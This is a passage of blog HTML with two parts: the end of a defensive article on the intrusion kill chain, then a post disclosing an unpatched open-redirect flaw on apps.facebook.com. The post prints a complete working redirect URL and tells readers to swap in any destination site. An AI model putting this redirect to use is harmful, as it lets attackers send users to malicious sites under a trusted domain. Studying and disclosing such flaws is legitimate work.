Objective<o:p></o:p></div>
</td>
<td style="border-top: none; border: solid black 1.0pt; mso-border-bottom-alt: solid black .25pt; mso-border-left-alt: solid black .25pt; mso-border-right-alt: solid black .25pt; padding: 2.75pt 2.75pt 2.75pt 2.75pt; width: 382.55pt;" valign="top" width="510"><div class="TableContents">
After progressing through the previous 6 phases, the
intruder takes action to achieve their objective. The most common objectives are: data extraction, disruption of the network,
and/or use of the target's network as a hop point.<o:p></o:p></div>
</td>
</tr>
</tbody></table>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
Lockheed Martin's analysts also discovered while
mapping the intruder's activities, that a break (kill) in any one link in the
chain would cause the intrusion to fail in its objective. This is one of the
major benefits of the intrusion kill chain framework as security professionals
have traditionally taken a defensive approach when it comes to incident
response. This means that intrusions can be dealt with offensively too.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<o:p></o:p></div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
Lockheed Martin's case studies reveal that knowledge
about previous intrusions and how they were accomplished allow analysts to
recognize those previously used tactics and exploits in current attacks. For example, mapping of three intrusions
revealed that all three were delivered via email, all three used very similar encryption,
all three used the same installation program and connected to the same outside
collection site. All of the intrusions were stopped before they accomplished
their objective.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<o:p></o:p></div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
How did they do this? How can my company utilize this
approach?</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<o:p></o:p></div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
Monitoring and mapping is the key.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<o:p></o:p></div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<div style="text-align: justify;">
The following list contains some of the necessary
components (not in any particular order) needed to do intrusion mapping and
setting up the kill.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 5.75pt; margin-left: 0in; margin-right: 0in; margin-top: 5.75pt;">
<o:p></o:p></div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Network Intrusion Detection (NIDS)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Network Intrusion Prevention (NIPS)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Host Intrusion Detection (HIDS)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Firewall access control lists (ACL)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Full packet inspection<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->A mature IT asset management system<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->A mature and comprehensive Configuration
Management Database (CMDB)<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Device and system hardening<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Secure configurations baselines<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Website inspection<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Honeypots<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Anti-virus and anti-malware<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Verbose logging – network devices, servers,
databases, and applications<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Log correlation<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Alerting<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Patching<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Email and FTP inspection and filtering<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Network tracing tools<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Information Security staff trained in tracking
and mapping events end-to-end<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l0 level1 lfo1; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Coordination and partnering with IT, Application
Owners, Database Administrators, Business Units and Management both in
investigation and communicating the mapped intrusions.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
<br /></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
In short, in order to implement intrusion kill chain
activity a company needs to have a mature inter-operating and information security
program. Additionally, they need trained staff that can investigate, map and
advise 'kill' activities, keep a compendium of mapped intrusions, analyze and
compare old and new intruder activity, code use, and delivery methods to thwart
current and future intrusions.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
The intrusion (cyber) kill chain is not an endeavor that
can be successfully implemented in place of a comprehensive Information
Security Program, it’s another tool to be used to protect the company's data
assets.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<o:p></o:p></div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
The good news is if your company doesn't have a mature
information security program there is a lot you can do while making plans to
introduce an intrusion kill chains in your department's arsenal.</div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<o:p></o:p></div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Educate your employees to watch for suspicious
emails. For instance, emails that seem to be off – such as, someone in
accounting receiving an invitation to attend a marketing conference. Let them
know that they shouldn't open attachments included in email like this.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Make sure you have anti-virus and anti-malware software
installed and up to date.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Start an inventory of your computing devices,
laptops, desktops, tablets, smartphones, network devices and security devices.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->You have an advantage over intruders. You know
your network and what is normal and usual, they don't. Notice user behavior that is not usual and
look into it. For example, a login at 2am
for someone who works 9 to 5. Or an application process that normally runs
overnight that is kicking off during the day.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Keep your security patches up to date.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Create and monitor baseline configurations.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Write, publish and communicate information
security policies and company standards.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Turn on logging and start collecting and keeping
logs. Start with network devices and firewalls and then add servers and
databases. Set up alerts for things such
as repeated attempts at access.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt; mso-list: l1 level1 lfo2; tab-stops: list .5in; text-indent: -.25in;">
<div style="text-align: justify;">
<!--[if !supportLists]--><span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: 'Times New Roman'; font-size: 7pt;">
</span></span><!--[endif]-->Spend some time using search engines from
outside your network to see how much information can be learned about your
company from the Internet. You'd be
surprised how much you can find including sensitive documents.<o:p></o:p></div>
</div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: .5in; margin-right: 0in; margin-top: 2.9pt;">
<div style="text-align: justify;">
<br /></div>
</div>
<div style="text-align: justify;">
All of these practices and activities give you more
information about your computing environment and what is normal and usual. The
more you know about your environment, the more likely it is that you will spot
the intruder before any damage is done.</div>
<br />
<div style="text-align: justify;">
<b><u>Disclaimer:-</u> </b>Before conclusion, on behalf of <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b>, I would like to personally thank <b>Mr. </b><span style="text-align: center;"><b>Adrian Stolarski</b> for sharing this remarkable article with our readers. I would also like to thank </span><b>Ryan Fahey</b> <span style="text-align: center;"> of <b><a href="http://infosecinstitute.com/">Infosec Institute</a></b> for his spontaneous effort. </span></div>
<div style="text-align: justify;">
<span style="text-align: center;"><br /></span></div>
<div style="text-align: justify;">
<span style="text-align: center;"><br /></span></div>
<div class="MsoBodyText" style="margin-bottom: 2.9pt; margin-left: 0in; margin-right: 0in; margin-top: 2.9pt;">
<o:p></o:p></div>
</div>
Avik Sarkarhttp://www.blogger.com/profile/15506950346762737730noreply@blogger.comtag:blogger.com,1999:blog-3968483416361429386.post-1196866808705258102014-01-02T23:10:00.000+05:302014-02-10T01:48:47.721+05:30VOGH Exclusive: URL Redirection Vulnerability Found In Facebook <div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
<div style="text-align: center;">
<span style="font-size: large;"><b>VOGH Exclusive:</b> <b><span style="color: red;">URL Redirection Vulnerability</span></b> Found In <b><span style="color: blue;">Facebook</span></b> [The Vulnerability Still Active & Not Been Patched]</span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtnVSE0uRdUkBn5GBqgCcYgBJwFOjEFbz63GOUHWDJ9ilEwGx1CGN_xpsHBnxxxm0uf2TfnfHTzgogqzV04xw-LPMuLArFhrahfTd2pHwNb6og26DD6IbhVQkPwa0N3d9bcewkg7AsFUM/s1600/url-redirection-vulnerability-in-facebook.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgtnVSE0uRdUkBn5GBqgCcYgBJwFOjEFbz63GOUHWDJ9ilEwGx1CGN_xpsHBnxxxm0uf2TfnfHTzgogqzV04xw-LPMuLArFhrahfTd2pHwNb6og26DD6IbhVQkPwa0N3d9bcewkg7AsFUM/s400/url-redirection-vulnerability-in-facebook.jpg" height="275" width="600" /></a></div>
<a href="http://www.voiceofgreyhat.com/search?q=Facebook">Facebook</a> -the world's largest <a href="http://www.voiceofgreyhat.com/search?q=social+networking">social networking</a> site with registered users of more than one billion, is considered among one of the safest site of the <a href="http://www.voiceofgreyhat.com/search?q=cyber+space">cyber space</a>. To maintain such reputation Facebook Inc has done all the required steps, that one could possibly take. Like other high profile and very popular websites, Facebook also stand as one of the hot target of almost every <a href="http://www.voiceofgreyhat.com/search?q=cyber+criminal">cyber criminals</a> of the world. To get rid of this and make FB safe and secure, the company have introduced what it called <a href="http://www.voiceofgreyhat.com/2011/07/facebook-launches-security-bug-bounty.html">'Bug Bounty'</a> offer; where you can submit <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerabilities</a> to FB and <a href="http://www.voiceofgreyhat.com/2012/05/facebook-said-please-hack-us-get-bounty.html">get rewarded</a>. We have seen many <a href="http://www.voiceofgreyhat.com/search?q=security+researchers">security researchers</a> and <a href="http://www.voiceofgreyhat.com/search?q=hackers">hackers</a> across the globe has done this and get their award. But not every time, and today I will talk about that- few days ago a reader of <a href="http://www.voiceofgreyhat.com/">VOGH</a>, who also goes by the nick name of <a href="http://www.voiceofgreyhat.com/search?q=Dr41DeY">'Dr41DeY'</a> has figured out a <b><span style="color: red;">URL redirection vulnerability</span></b> in <b>Facebook</b>. One of the link in Facebook App which is <b>apps.facebook.com</b> is posing URL redirection vulnerability. The hacker has <a href="http://www.youtube.com/watch?v=I3H12oL08bk&feature=youtu.be">demonstrated</a> how any one can use the <a href="http://www.voiceofgreyhat.com/search/label/vulnerablity">vulnerability</a> in order to manipulate millions of innocent Facebook users. Let see </div>
<span class="embed-youtube" style="display: block; text-align: center;"><iframe class="youtube-player" frameborder="0" height="359" src="http://www.youtube.com/embed/I3H12oL08bk?version=3&rel=1&fs=1&showsearch=0&showinfo=1&iv_load_policy=1&wmode=transparent" type="text/html" width="584"></iframe></span><br />
<div style="text-align: justify;">
Before publishing this, one of our VOGH representative have talked with<a href="http://www.facebook.com/whitehat"> Facebook Security</a> regarding this <a href="http://www.voiceofgreyhat.com/search?q=security+vulnerability">security vulnerability</a>, but due to some reason FB might overlooked this issue. Finally after waiting for almost a week, we the <b><a href="http://www.voiceofgreyhat.com/">Team VOGH</a></b> decided to bring this in-front of our reader. Let briefly go through with the vulnerable link- </div>
<br />
<a href="https://apps.facebook.com/a.php?u=http://www.voiceofgreyhat.com&mac=AQLy7nyXi5NBt31j&__tn__=*B&eid=AQLpbizR7KEf3cyD0VTN7fNtv99fMZABDp2gdWhvL-MQocJIPy3w4hUG7_7hrmSMqDq7QLCI9k_0LbB95NEz_6GUDHGNgTDsGP_rX-VWRHxfg5a--VlnN1K9FdG3NAek8r2JPWENkb2Mu56EckbZCGXcPie27OnHxE-H7MBufQel0Pr-ZjpCWB6QF5xHeWsdKqyHzjK2woBGGrjk9Dlgnzcw3d9ZWPzrwbGpm6MSkpks3mqEphXnTP2Vd9UDQxIs68NnTaO35XIwKq5t3CSdb11iU_34gzjfLgvvDo_BYbgtrGe0Juc5CpRSwd5nImw9oPPvn6Za9rrxO_ivROtOGc2b2S3bYzNLWpbDwt3cFN2rJ3JElyIR0vjB4R859PpE9SrZx6AD3s_liikzPh30YLVb8XvPABk7r9MShk6OrVFPiAWZnEvPx49UzPDSF-nEl188rEPAi0KGJ4u1zb10hhzmHUCjH04SezDByUkyNituMb2lgiQz-Xlpgy_tkVYR-U7plDa38N9VzdAj_Bwefd7B85ykZCAy9ZQOt48Ql8KQeKfivk3sThZIkLwWPiju7R28Sw6bj09vS_Y28kFSqanGe9tYAPfKIe4zOzQt9-Q1CC_EwX3ypOlyQ2yXMiU3lwp7M9EriKHRFDsTgsuzzF-uvlpx3UrWh8M55-NX0ULjr4kxjAR5g_1wU-luUyn_Ot6Ly1_ZbBdahyb5uSmCDNvF5kMuIH8Gxvpql45dNffGzKau9oZGn6r1OmsG47JIGipznCVaZnWjXAakDnEMX6X8ZtI-M-db1olzbBpJdj5sZe-x2VM02S5XsXJWe_QLxFDOupjbz8I82HETHQ9PbzSIMsJboll4E3-f_JQFfdzwEguLa8SC_ImRahWBCwKNJeSlmRv91FqWpQaChe5-UyAoqcblvK4jPuRO3qC7o-qMTQ2jEJqqUW46koulOmgNJpMYXPgRxjNGcwjyTPS59Nr08zq6eCNd1aYLh2E4s5MYXBtVUTF8l0uhQ2wYSoR66xZsI2tK0DD1KiQHyTO1QieBwPtCN3eWgRzUTg3lM3ttkuwYKRPPLDvtUOPWmZhYUzUFcbfPM2kXdpqyGlrGx9-ErKGygYKATx2xzrTzktjgW4q0L5wfO3CSKAOCAoKfi_pfz-zIHSNE8ZAjZDtpbC_chgkvbHWJYYIs7pnE1riWJYORACjkkRr6nZoivC3z_g-8JBahghwy2C34kJYZJ6cBC8LKoB6KCTbj_F1tArQAzcSUij4vrJNUATzsdlO_ol6HwUQb8FjoWa38Bhtx81stxB328sgC9IGu1omPG0QeNJVhcJwh6HyEwtgycBLrlcdedaWbkwvnjv3F3BWuJIi763nBeYuAgNUaEUYHaXu_ZJzXW8fQ72nz_hddGT_GH50&sig=89099">https://apps.facebook.com/a.php?u=<b><span style="color: red;">http://www.voiceofgreyhat.com</span></b>&mac=AQLy7nyXi5NBt31j&__tn__=*B&eid=AQLpbizR7KEf3cyD0VTN7fNtv99fMZABDp2gdWhvL-MQocJIPy3w4hUG7_7hrmSMqDq7QLCI9k_0LbB95NEz_6GUDHGNgTDsGP_rX-VWRHxfg5a--VlnN1K9FdG3NAek8r2JPWENkb2Mu56EckbZCGXcPie27OnHxE-H7MBufQel0Pr-ZjpCWB6QF5xHeWsdKqyHzjK2woBGGrjk9Dlgnzcw3d9ZWPzrwbGpm6MSkpks3mqEphXnTP2Vd9UDQxIs68NnTaO35XIwKq5t3CSdb11iU_34gzjfLgvvDo_BYbgtrGe0Juc5CpRSwd5nImw9oPPvn6Za9rrxO_ivROtOGc2b2S3bYzNLWpbDwt3cFN2rJ3JElyIR0vjB4R859PpE9SrZx6AD3s_liikzPh30YLVb8XvPABk7r9MShk6OrVFPiAWZnEvPx49UzPDSF-nEl188rEPAi0KGJ4u1zb10hhzmHUCjH04SezDByUkyNituMb2lgiQz-Xlpgy_tkVYR-U7plDa38N9VzdAj_Bwefd7B85ykZCAy9ZQOt48Ql8KQeKfivk3sThZIkLwWPiju7R28Sw6bj09vS_Y28kFSqanGe9tYAPfKIe4zOzQt9-Q1CC_EwX3ypOlyQ2yXMiU3lwp7M9EriKHRFDsTgsuzzF-uvlpx3UrWh8M55-NX0ULjr4kxjAR5g_1wU-luUyn_Ot6Ly1_ZbBdahyb5uSmCDNvF5kMuIH8Gxvpql45dNffGzKau9oZGn6r1OmsG47JIGipznCVaZnWjXAakDnEMX6X8ZtI-M-db1olzbBpJdj5sZe-x2VM02S5XsXJWe_QLxFDOupjbz8I82HETHQ9PbzSIMsJboll4E3-f_JQFfdzwEguLa8SC_ImRahWBCwKNJeSlmRv91FqWpQaChe5-UyAoqcblvK4jPuRO3qC7o-qMTQ2jEJqqUW46koulOmgNJpMYXPgRxjNGcwjyTPS59Nr08zq6eCNd1aYLh2E4s5MYXBtVUTF8l0uhQ2wYSoR66xZsI2tK0DD1KiQHyTO1QieBwPtCN3eWgRzUTg3lM3ttkuwYKRPPLDvtUOPWmZhYUzUFcbfPM2kXdpqyGlrGx9-ErKGygYKATx2xzrTzktjgW4q0L5wfO3CSKAOCAoKfi_pfz-zIHSNE8ZAjZDtpbC_chgkvbHWJYYIs7pnE1riWJYORACjkkRr6nZoivC3z_g-8JBahghwy2C34kJYZJ6cBC8LKoB6KCTbj_F1tArQAzcSUij4vrJNUATzsdlO_ol6HwUQb8FjoWa38Bhtx81stxB328sgC9IGu1omPG0QeNJVhcJwh6HyEwtgycBLrlcdedaWbkwvnjv3F3BWuJIi763nBeYuAgNUaEUYHaXu_ZJzXW8fQ72nz_hddGT_GH50&sig=89099</a><br />
<br />
Replace voiceofgreyhat.com with any of your favorite site, and the the said vulnerability will allow you to get redirected to that very website you want to from Facebook. This loophole is still active, and any one can test that with the above url, we thought the impact of this loophole is very serious, as any malicious attacker can misuse the trust-hod of Facebook's url in order to harm regular internet users, while redirecting them to any junk or malfunctional websites.<br />
<br />
<b><u>Disclaimer:-</u></b> Earlier I told that the issue has already brought into the notice of Facebook Security, but they overlooked the whole issue, so being a responsible <a href="http://www.voiceofgreyhat.com/search?q=cyber+media">cyber media</a>, we VOGH are disclosing this to people. If any one misuse this vulnerability, then <a href="http://www.voiceofgreyhat.com/">Voiceofgreyhat</a> will not at all be responsible for any kind of mishap.<br />
<br />
<div style="text-align: justify;">
